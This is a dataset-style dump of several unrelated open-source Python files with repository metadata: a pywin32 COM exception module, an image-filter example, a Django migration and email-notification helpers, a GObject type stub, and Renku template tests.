| [
"[email protected]"
] | |
1525fa01ca88e86a1491f6968ca7daf25bda962c | c086a38a366b0724d7339ae94d6bfb489413d2f4 | /PythonEnv/Lib/site-packages/win32com/server/exception.py | f84cccdf5e349025e91ae2f9bdf4e87a0bb9e8d9 | [] | no_license | FlowkoHinti/Dionysos | 2dc06651a4fc9b4c8c90d264b2f820f34d736650 | d9f8fbf3bb0713527dc33383a7f3e135b2041638 | refs/heads/master | 2021-03-02T01:14:18.622703 | 2020-06-09T08:28:44 | 2020-06-09T08:28:44 | 245,826,041 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,452 | py | """Exception Handling
Exceptions
To better support COM exceptions, the framework allows for an instance to be
raised. This instance may have a certain number of known attributes, which are
translated into COM exception details.
This means, for example, that Python could raise a COM exception that includes details
on a Help file and location, and a description for the user.
This module provides a class which provides the necessary attributes.
"""
import sys, pythoncom
# Note that we derive from com_error, which derives from exceptions.Exception
# Also note that we dont support "self.args", as we dont support tuple-unpacking
class COMException(pythoncom.com_error):
"""An Exception object that is understood by the framework.
If the framework is presented with an exception of type class,
it looks for certain known attributes on this class to provide rich
error information to the caller.
It should be noted that the framework supports providing this error
information via COM Exceptions, or via the ISupportErrorInfo interface.
By using this class, you automatically provide rich error information to the
server.
"""
def __init__(self, description=None, scode=None,
source=None, helpfile=None, helpContext=None,
desc=None, hresult=None):
"""Initialize an exception
**Params**
description -- A string description for the exception.
scode -- An integer scode to be returned to the server, if necessary.
The pythoncom framework defaults this to be DISP_E_EXCEPTION if not specified otherwise.
source -- A string which identifies the source of the error.
helpfile -- A string which points to a help file which contains details on the error.
helpContext -- An integer context in the help file.
desc -- A short-cut for description.
hresult -- A short-cut for scode.
"""
# convert a WIN32 error into an HRESULT
scode = scode or hresult
if scode and scode != 1: # We dont want S_FALSE mapped!
if scode >= -32768 and scode < 32768:
# this is HRESULT_FROM_WIN32()
scode = -2147024896 | (scode & 0x0000FFFF)
self.scode = scode
self.description = description or desc
if scode == 1 and not self.description:
self.description = "S_FALSE"
elif scode and not self.description:
self.description = pythoncom.GetScodeString(scode)
self.source = source
self.helpfile = helpfile
self.helpcontext = helpContext
# todo - fill in the exception value
pythoncom.com_error.__init__(self, scode, self.description, None, -1)
def __repr__(self):
return "<COM Exception - scode=%s, desc=%s>" % (self.scode, self.description)
# Old name for the COMException class.
# Do NOT use the name Exception, as it is now a built-in
# COMException is the new, official name.
Exception = COMException
def IsCOMException(t=None):
if t is None:
t = sys.exc_info()[0]
try:
return issubclass(t, pythoncom.com_error)
except TypeError: # 1.5 in -X mode?
return t is pythoncon.com_error
def IsCOMServerException(t=None):
if t is None:
t = sys.exc_info()[0]
try:
return issubclass(t, COMException)
except TypeError: # String exception
return 0
| [
"="
] | = |
f1de4f284f6ae6dcbf0e216dae4bd4020b7fe948 | cd5746f8cc7aee1f20606a65b4fae0d5e8ee78dc | /Python Books/Mastering-Machine-Learning-scikit-learn/NumPy-Cookbook/NumPy Cookbook 2nd Edition_CodeBundle/Final Code/0945OS_05_Final Code/ch5code/sobel.py | 7a60c93500bba9e0a6d9825f564f9b66bfa7ba43 | [] | no_license | theGreenJedi/Path | df24fca355590efef0c6cb5c52e7216c6b5d2464 | b5ed2805dbb046480929e49e550bfd8af5bb4d6f | refs/heads/master | 2023-07-27T14:23:37.694546 | 2021-07-16T01:38:55 | 2021-07-16T01:38:55 | 87,686,563 | 8 | 2 | null | 2023-07-11T22:49:03 | 2017-04-09T05:57:30 | Jupyter Notebook | UTF-8 | Python | false | false | 623 | py | import scipy
import scipy.ndimage
import matplotlib.pyplot as plt
lena = scipy.misc.lena()
plt.subplot(221)
plt.imshow(lena)
plt.title('Original')
plt.axis('off')
# Sobel X filter
sobelx = scipy.ndimage.sobel(lena, axis=0, mode='constant')
plt.subplot(222)
plt.imshow(sobelx)
plt.title('Sobel X')
plt.axis('off')
# Sobel Y filter
sobely = scipy.ndimage.sobel(lena, axis=1, mode='constant')
plt.subplot(223)
plt.imshow(sobely)
plt.title('Sobel Y')
plt.axis('off')
# Default Sobel filter
default = scipy.ndimage.sobel(lena)
plt.subplot(224)
plt.imshow(default)
plt.title('Default Filter')
plt.axis('off')
plt.show()
| [
"[email protected]"
] | |
3f2079b1e4c24c815959e7a54257986eb1c35628 | 82199bfad7b77d62aa265c8ea463e20df6901801 | /global_variables.py | 0349063285f925772377b500255d2fdee5a359ce | [] | no_license | hyzcn/interactive-behaviour-design | 6119f8685b91226916f06678735fcfea5e6c27ab | 26faa63f0d1494dedd7dd9c3757ab08ec6473119 | refs/heads/master | 2020-05-16T09:04:42.342957 | 2019-04-22T19:26:27 | 2019-04-22T19:38:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | # ALE is generally safe to use from multiple threads, but we do need to be careful about
# two threads creating environments at the same time:
# https://github.com/mgbellemare/Arcade-Learning-Environment/issues/86
# Any thread which creates environments (which includes restoring from a reset state)
# should acquire this lock before attempting the creation.
env_creation_lock = None
segment_save_mode = None
max_segs = None | [
"[email protected]"
] | |
9b43ee53672fb7b8aa059524c4d04d2b92fd2289 | 689a557b32161faafeb0b68076bca96b65c320ce | /restourant/migrations/0003_auto_20170726_1525.py | 3156e7bad15655147d6acc6853903542146c11b9 | [] | no_license | FNSalimov/new | 5d957a5e2543bcecece2fa88e4ff61030eb58203 | e2b15e5e83dbc22d776112fc5859219d7f625e4f | refs/heads/master | 2021-01-01T18:36:54.171096 | 2017-07-27T06:27:24 | 2017-07-27T06:27:24 | 98,386,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 740 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-07-26 12:25
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('restourant', '0002_order_orderdish'),
]
operations = [
migrations.RemoveField(
model_name='orderdish',
name='dish',
),
migrations.RemoveField(
model_name='orderdish',
name='order',
),
migrations.AddField(
model_name='order',
name='dishes',
field=models.ManyToManyField(to='restourant.Dish'),
),
migrations.DeleteModel(
name='OrderDish',
),
]
| [
"[email protected]"
] | |
8519508e4603dd2e130c752354be03bd1e5116b5 | 6cb32cc2ee3ced7ea1a710283633d2cd76c42232 | /commercialoperator/components/organisations/emails.py | cc8911455d416c0462204f47e0455ba75fcf812b | [
"Apache-2.0"
] | permissive | dbca-wa/commercialoperator | 913889973066a5e8bd399835cfbaf948af4ea596 | e29306b1c6213f0f37a6a190e439745965ee3e32 | refs/heads/master | 2023-08-31T01:19:06.803451 | 2023-07-28T01:40:38 | 2023-07-28T01:40:38 | 239,469,350 | 0 | 10 | NOASSERTION | 2023-09-07T07:25:58 | 2020-02-10T09:07:54 | Python | UTF-8 | Python | false | false | 16,300 | py | import logging
from django.core.mail import EmailMultiAlternatives, EmailMessage
from django.utils.encoding import smart_text
from django.core.urlresolvers import reverse
from django.conf import settings
from commercialoperator.components.emails.emails import TemplateEmailBase
logger = logging.getLogger(__name__)
SYSTEM_NAME = settings.SYSTEM_NAME_SHORT + ' Automated Message'
class OrganisationRequestAcceptNotificationEmail(TemplateEmailBase):
subject = 'Your organisation request has been accepted.'
html_template = 'commercialoperator/emails/organisation_request_accept_notification.html'
txt_template = 'commercialoperator/emails/organisation_request_accept_notification.txt'
class OrganisationAccessGroupRequestAcceptNotificationEmail(TemplateEmailBase):
subject = 'New organisation request has been submitted.'
html_template = 'commercialoperator/emails/org_access_group_request_accept_notification.html'
txt_template = 'commercialoperator/emails/org_access_group_request_accept_notification.txt'
class OrganisationRequestNotificationEmail(TemplateEmailBase):
subject = 'An organisation request has been submitted for approval'
html_template = 'commercialoperator/emails/organisation_request_notification.html'
txt_template = 'commercialoperator/emails/organisation_request_notification.txt'
class OrganisationRequestDeclineNotificationEmail(TemplateEmailBase):
subject = 'Your organisation request has been declined.'
html_template = 'commercialoperator/emails/organisation_request_decline_notification.html'
txt_template = 'commercialoperator/emails/organisation_request_decline_notification.txt'
class OrganisationLinkNotificationEmail(TemplateEmailBase):
subject = '{} - Confirmation - Account linked.'.format(settings.DEP_NAME)
html_template = 'commercialoperator/emails/organisation_link_notification.html'
txt_template = 'commercialoperator/emails/organisation_link_notification.txt'
class OrganisationUnlinkNotificationEmail(TemplateEmailBase):
subject = 'You have been unlinked from an organisation.'
html_template = 'commercialoperator/emails/organisation_unlink_notification.html'
txt_template = 'commercialoperator/emails/organisation_unlink_notification.txt'
class OrganisationContactAdminUserNotificationEmail(TemplateEmailBase):
subject = 'You have been linked as Company Admin Role.'
html_template = 'commercialoperator/emails/organisation_contact_admin_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_admin_notification.txt'
class OrganisationContactUserNotificationEmail(TemplateEmailBase):
subject = 'You have been linked as Company User Role.'
html_template = 'commercialoperator/emails/organisation_contact_user_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_user_notification.txt'
class OrganisationContactSuspendNotificationEmail(TemplateEmailBase):
subject = 'You have been suspended as Company User.'
html_template = 'commercialoperator/emails/organisation_contact_suspend_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_suspend_notification.txt'
class OrganisationContactReinstateNotificationEmail(TemplateEmailBase):
subject = 'You have been Reinstated as Company User.'
html_template = 'commercialoperator/emails/organisation_contact_reinstate_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_reinstate_notification.txt'
class OrganisationContactDeclineNotificationEmail(TemplateEmailBase):
subject = 'Your organisation link request has been declined.'
html_template = 'commercialoperator/emails/organisation_contact_decline_notification.html'
txt_template = 'commercialoperator/emails/organisation_contact_decline_notification.txt'
class OrganisationAddressUpdatedNotificationEmail(TemplateEmailBase):
subject = 'An organisation''s address has been updated'
html_template = 'commercialoperator/emails/organisation_address_updated_notification.html'
txt_template = 'commercialoperator/emails/organisation_address_updated_notification.txt'
class OrganisationIdUploadNotificationEmail(TemplateEmailBase):
subject = 'An organisation''s identification has been uploaded'
html_template = 'commercialoperator/emails/organisation_id_upload_notification.html'
txt_template = 'commercialoperator/emails/organisation_id_upload_notification.txt'
class OrganisationRequestLinkNotificationEmail(TemplateEmailBase):
subject = 'An organisation request to be linked has been sent for approval'
html_template = 'commercialoperator/emails/organisation_request_link_notification.html'
txt_template = 'commercialoperator/emails/organisation_request_link_notification.txt'
def send_organisation_id_upload_email_notification(emails, organisation, org_contact, request):
email = OrganisationIdUploadNotificationEmail()
context = {
'organisation': organisation
}
msg = email.send(emails, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, org_contact, sender=sender)
def send_organisation_request_link_email_notification(
org_request, request, contact):
email = OrganisationRequestLinkNotificationEmail()
url = request.build_absolute_uri(
'/external/organisations/manage/{}'.format(org_request.id))
context = {
'request': org_request,
'url': url,
}
msg = email.send(contact, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, org_request, request.user, sender=sender)
def send_organisation_reinstate_email_notification(linked_user,linked_by,organisation,request):
email = OrganisationContactReinstateNotificationEmail()
context = {
'user': linked_user,
'linked_by': linked_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(linked_user.email,cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, linked_user, sender=sender)
def send_organisation_contact_suspend_email_notification(linked_user,linked_by,organisation,request):
email = OrganisationContactSuspendNotificationEmail()
context = {
'user': linked_user,
'linked_by': linked_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(linked_user.email,cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, linked_user, sender=sender)
def send_organisation_contact_decline_email_notification(user_contact,deleted_by,organisation,request):
email = OrganisationContactDeclineNotificationEmail()
context = {
'user': user_contact,
'linked_by': deleted_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(user_contact.email, cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, user_contact, sender=sender)
def send_organisation_contact_user_email_notification(linked_user,linked_by,organisation,request):
email = OrganisationContactUserNotificationEmail()
context = {
'user': linked_user,
'linked_by': linked_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(linked_user.email,cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, linked_user, sender=sender)
def send_organisation_contact_adminuser_email_notification(linked_user,linked_by,organisation,request):
email = OrganisationContactAdminUserNotificationEmail()
context = {
'user': linked_user,
'linked_by': linked_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(linked_user.email,cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, linked_user, sender=sender)
def send_organisation_link_email_notification(linked_user,linked_by,organisation,request):
email = OrganisationLinkNotificationEmail()
context = {
'user': linked_user,
'linked_by': linked_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(linked_user.email,cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, linked_user, sender=sender)
def send_organisation_request_email_notification(org_request, request, contact):
email = OrganisationRequestNotificationEmail()
url = request.build_absolute_uri('/internal/organisations/access/{}'.format(org_request.id))
if "-internal" not in url:
url = "{0}://{1}{2}.{3}{4}".format(request.scheme, settings.SITE_PREFIX, '-internal', settings.SITE_DOMAIN,
url.split(request.get_host())[1])
context = {
'request': request.data,
'url': url,
}
msg = email.send(contact, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_request_email(msg, org_request, sender=sender)
def send_organisation_unlink_email_notification(unlinked_user,unlinked_by,organisation,request):
email = OrganisationUnlinkNotificationEmail()
context = {
'user': unlinked_user,
'unlinked_by': unlinked_by,
'organisation': organisation
}
all_ccs = []
if organisation.email:
cc_list = organisation.email
if cc_list:
all_ccs = [cc_list]
msg = email.send(unlinked_user.email,cc=all_ccs, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_email(msg, organisation, unlinked_user, sender=sender)
def send_organisation_request_accept_email_notification(org_request,organisation,request):
email = OrganisationRequestAcceptNotificationEmail()
context = {
'request': org_request
}
msg = email.send(org_request.requester.email, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_request_email(msg, org_request, sender=sender)
_log_org_email(msg, organisation, org_request.requester, sender=sender)
def send_org_access_group_request_accept_email_notification(org_request, request, recipient_list):
email = OrganisationAccessGroupRequestAcceptNotificationEmail()
url = request.build_absolute_uri('/internal/organisations/access/{}'.format(org_request.id))
if "-internal" not in url:
url = '-internal.{}'.format(settings.SITE_DOMAIN).join(url.split('.' + settings.SITE_DOMAIN))
context = {
'name': request.data.get('name'),
'abn': request.data.get('abn'),
'url': url,
}
msg = email.send(recipient_list, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_request_email(msg, org_request, sender=sender)
# commenting out because Organisation does not yet exist - only OrganisationRequest exists
#_log_org_email(msg, organisation, org_request.requester, sender=sender)
def send_organisation_request_decline_email_notification(org_request,request):
email = OrganisationRequestDeclineNotificationEmail()
context = {
'request': org_request
}
msg = email.send(org_request.requester.email, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
_log_org_request_email(msg, org_request, sender=sender)
#_log_org_email(msg, organisation, org_request.requester, sender=sender)
def send_organisation_address_updated_email_notification(address_updated_by,ledger_organisation,wc_organisation,request):
from commercialoperator.components.organisations.models import OrganisationContact
email = OrganisationAddressUpdatedNotificationEmail()
context = {
'address_updated_by': address_updated_by,
'organisation': ledger_organisation
}
for org_contact in OrganisationContact.objects.filter(user_role='organisation_admin',organisation=wc_organisation):
msg = email.send(org_contact.email, context=context)
sender = request.user if request else settings.DEFAULT_FROM_EMAIL
def _log_org_request_email(email_message, request, sender=None):
from commercialoperator.components.organisations.models import OrganisationRequestLogEntry
if isinstance(email_message, (EmailMultiAlternatives, EmailMessage,)):
# TODO this will log the plain text body, should we log the html instead
text = email_message.body
subject = email_message.subject
fromm = smart_text(sender) if sender else smart_text(email_message.from_email)
# the to email is normally a list
if isinstance(email_message.to, list):
to = ','.join(email_message.to)
else:
to = smart_text(email_message.to)
# we log the cc and bcc in the same cc field of the log entry as a ',' comma separated string
all_ccs = []
if email_message.cc:
all_ccs += list(email_message.cc)
if email_message.bcc:
all_ccs += list(email_message.bcc)
all_ccs = ','.join(all_ccs)
else:
text = smart_text(email_message)
subject = ''
to = request.requester.email
fromm = smart_text(sender) if sender else SYSTEM_NAME
all_ccs = ''
customer = request.requester
staff = sender
kwargs = {
'subject': subject,
'text': text,
'request': request,
'customer': customer,
'staff': staff,
'to': to,
'fromm': fromm,
'cc': all_ccs
}
email_entry = OrganisationRequestLogEntry.objects.create(**kwargs)
return email_entry
def _log_org_email(email_message, organisation, customer ,sender=None):
from commercialoperator.components.organisations.models import OrganisationLogEntry
if isinstance(email_message, (EmailMultiAlternatives, EmailMessage,)):
# TODO this will log the plain text body, should we log the html instead
text = email_message.body
subject = email_message.subject
fromm = smart_text(sender) if sender else smart_text(email_message.from_email)
# the to email is normally a list
if isinstance(email_message.to, list):
to = ','.join(email_message.to)
else:
to = smart_text(email_message.to)
# we log the cc and bcc in the same cc field of the log entry as a ',' comma separated string
all_ccs = []
if email_message.cc:
all_ccs += list(email_message.cc)
if email_message.bcc:
all_ccs += list(email_message.bcc)
all_ccs = ','.join(all_ccs)
else:
text = smart_text(email_message)
subject = ''
to = request.requester.email
fromm = smart_text(sender) if sender else SYSTEM_NAME
all_ccs = ''
customer = customer
staff = sender
kwargs = {
'subject': subject,
'text': text,
'organisation': organisation,
'customer': customer,
'staff': staff,
'to': to,
'fromm': fromm,
'cc': all_ccs
}
email_entry = OrganisationLogEntry.objects.create(**kwargs)
return email_entry
| [
"[email protected]"
] | |
7263a68d87f21b4ea91d391b6d4f9ed8b297e855 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Clutter/TextPrivate.py | b4fbac1eab470075b4b2e86eeac89087a5a7d5ff | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,373 | py | # encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class TextPrivate(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(TextPrivate), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'TextPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'TextPrivate' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(TextPrivate)
| [
"[email protected]"
] | |
f44499d267dd8e234c6c753a888ab64ee817e509 | d63c4b9e05638d6abb68333edf43936134b97570 | /tests/core/models/test_template.py | 981933fcd9a8e20f4d54ca7c320469541ac33f2a | [
"Apache-2.0",
"Python-2.0"
] | permissive | SwissDataScienceCenter/renku-python | 316dc83646e9014803dff268438d34e844ba0b54 | e0ff587f507d049eeeb873e8488ba8bb10ac1a15 | refs/heads/develop | 2023-08-31T20:33:09.342385 | 2023-08-24T08:15:46 | 2023-08-24T08:15:46 | 100,947,017 | 30 | 25 | Apache-2.0 | 2023-09-12T21:52:34 | 2017-08-21T11:49:21 | Python | UTF-8 | Python | false | false | 9,532 | py | #
# Copyright 2019-2023 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Template tests."""
import textwrap
import pytest
from renku.core import errors
from renku.core.util.metadata import read_renku_version_from_dockerfile
from renku.domain_model.template import TemplateMetadata, TemplateParameter, TemplatesManifest
TEMPLATE_METADATA = {"__name__": "my-project", "__project_description__": "My Project", "__renku_version__": "42.0.0"}
def test_template_get_files(source_template):
"""Test get files of a template."""
files = set(source_template.get_files())
assert {
".gitignore",
".renku/renku.ini",
"Dockerfile",
"README.md",
"{{ __name__ }}.dummy",
"requirements.txt",
"immutable.file",
} == files
def test_template_render(source_template):
"""Test rendering a template."""
rendered_template = source_template.render(metadata=TemplateMetadata.from_dict(TEMPLATE_METADATA))
assert "A Renku project: My Project\n" == (rendered_template.path / "README.md").read_text()
assert "42.0.0" == str(read_renku_version_from_dockerfile(rendered_template.path / "Dockerfile"))
@pytest.mark.parametrize("name", ["", "a-renku-project"])
def test_template_render_with_templated_filename(source_template, name):
"""Test rendering a template with templated filenames."""
rendered_template = source_template.render(metadata=TemplateMetadata.from_dict({"__name__": name}))
assert (rendered_template.path / f"{name}.dummy").exists()
def test_template_get_rendered_files(source_template):
"""Test get files of a rendered template."""
rendered_template = source_template.render(metadata=TemplateMetadata.from_dict(TEMPLATE_METADATA))
assert {
".gitignore",
".renku/renku.ini",
"Dockerfile",
"README.md",
"my-project.dummy",
"requirements.txt",
"immutable.file",
} == set(rendered_template.get_files())
def test_templates_manifest():
"""Test creating a template manifest."""
manifest = TemplatesManifest.from_string(
textwrap.dedent(
"""
- folder: python
name: Python Project
description: A Python-based Renku project
variables: {}
icon: python.png
- id: R
aliases: ["R-minimal", "R-base"]
name: R Project
description: An R-based Renku project
variables:
rate:
type: number
description: sample rate
icon: R.png
"""
)
)
assert 2 == len(manifest.templates)
template = next(t for t in manifest.templates if t.id == "python")
assert [] == template.aliases
assert "Python Project" == template.name
assert "A Python-based Renku project" == template.description
assert "python.png" == template.icon
assert [] == template.parameters
template = next(t for t in manifest.templates if t.id == "R")
assert ["R-minimal", "R-base"] == template.aliases
assert "R Project" == template.name
assert "An R-based Renku project" == template.description
assert "R.png" == template.icon
assert 1 == len(template.parameters)
assert "rate" == template.parameters[0].name
assert "number" == template.parameters[0].type
assert "sample rate" == template.parameters[0].description
def test_templates_manifest_non_existing_file():
"""Test creating a template manifest form non-existing file."""
with pytest.raises(errors.InvalidTemplateError, match="There is no manifest file 'non-existing-path'"):
TemplatesManifest.from_path("non-existing-path")
def test_templates_manifest_binary_content(tmp_path):
"""Test creating a template manifest form non-text file."""
path = tmp_path / "manifest.yaml"
path.write_bytes(b"\x80") # NOTE: Write an invalid unicode sequence
with pytest.raises(errors.InvalidTemplateError, match="Cannot read manifest file.*manifest.yaml"):
TemplatesManifest.from_path(path)
def test_templates_manifest_invalid_yaml(tmp_path):
"""Test creating a template manifest form invalid YAML content."""
with pytest.raises(errors.InvalidTemplateError, match="Cannot parse manifest file"):
TemplatesManifest.from_string("- id: python\nid")
@pytest.mark.parametrize(
"content, message",
[
("", "Cannot find any valid template in manifest file"),
("id: python", "Invalid manifest content type: 'dict'"),
("-\n - id: python", "Invalid template type: 'list'"),
("- no-id: python", "Template doesn't have an id:"),
("- id: python\n variables: p1", "Invalid template variable type on template 'python': 'str'"),
("- id: python\n variables:\n p1: 42", "Invalid parameter type 'int' for 'p1'"),
("- id: python\n name: Python\n aliases: [R]\n- id: R\n name: R\n", "Found duplicate IDs or aliases: 'R'"),
],
)
def test_templates_manifest_invalid_content(tmp_path, content, message):
"""Test creating a template manifest form invalid content."""
with pytest.raises(errors.InvalidTemplateError, match=message):
TemplatesManifest.from_string(content)
def test_templates_manifest_warnings(tmp_path):
"""Test creating a template manifest form invalid content."""
content = "- folder: python\n name: python\n variables:\n p1: My parameter"
manifest = TemplatesManifest.from_string(content, skip_validation=True)
warnings = manifest.validate()
assert "Template 'python' should use 'id' attribute instead of 'folder'." in warnings
assert (
"Template 'python' variable 'p1' uses old string format in manifest and should be replaced"
" with the nested dictionary format."
) in warnings
@pytest.mark.parametrize("default, has_default", [(None, False), (42, True), ("", True), (False, True)])
def test_template_parameter_default_value(default, has_default):
"""Test parameter has not default only if default is None."""
parameter = TemplateParameter(name="parameter", description="", type="", default=default, possible_values=None)
parameter.validate()
assert default == parameter.default
assert parameter.has_default is has_default
@pytest.mark.parametrize(
"value, message",
[
({"type": "int"}, "Template contains variable .* of type 'int' which is not supported"),
({"possible_values": "42"}, "Invalid type for possible values of template variable"),
({"type": "enum"}, "Template variable 'parameter' of type enum does not provide a corresponding enum list"),
({"type": "number", "default_value": "true"}, "Invalid default value for 'parameter':"),
],
)
def test_template_parameter_validation(value, message):
"""Test TemplateVariable validations."""
with pytest.raises(errors.InvalidTemplateError, match=message):
parameter = TemplateParameter.from_dict(name="parameter", value=value)
parameter.validate()
@pytest.mark.parametrize(
"type, possible_values, value, expected_value, expected_type",
[
(None, None, "truE", "truE", str),
(None, None, True, True, bool),
(None, None, 42, 42, int),
(None, None, None, None, type(None)),
("boolean", None, "true", True, bool),
("boolean", None, True, True, bool),
("boolean", None, "False", False, bool),
("number", None, 42, 42, int),
("number", None, "42", 42, int),
("number", None, "42.0", 42, float),
("string", None, "", "", str),
("string", None, "some value", "some value", str),
("enum", ["1", "2", "3"], "2", "2", str),
],
)
def test_template_parameter_value_conversion(type, possible_values, value, expected_value, expected_type):
"""Test TemplateVariable conversion."""
parameter = TemplateParameter.from_dict(name="parameter", value={"type": type, "possible_values": possible_values})
converted_value = parameter.convert(value)
assert expected_value == converted_value
assert expected_type == converted_value.__class__
@pytest.mark.parametrize(
"type, possible_values, value",
[
("boolean", None, "TRUE"),
("boolean", None, 42),
("boolean", None, ""),
("number", None, "42.0f"),
("string", None, 42),
("enum", ["1", "2", "3"], "42"),
],
)
def test_template_parameter_value_conversion_error(type, possible_values, value):
"""Test TemplateVariable conversion with invalid values."""
parameter = TemplateParameter.from_dict(name="parameter", value={"type": type, "possible_values": possible_values})
with pytest.raises(ValueError, match=f"Invalid value '{value}.*' for template variable 'parameter.*'"):
parameter.convert(value)
| [
"[email protected]"
] | |
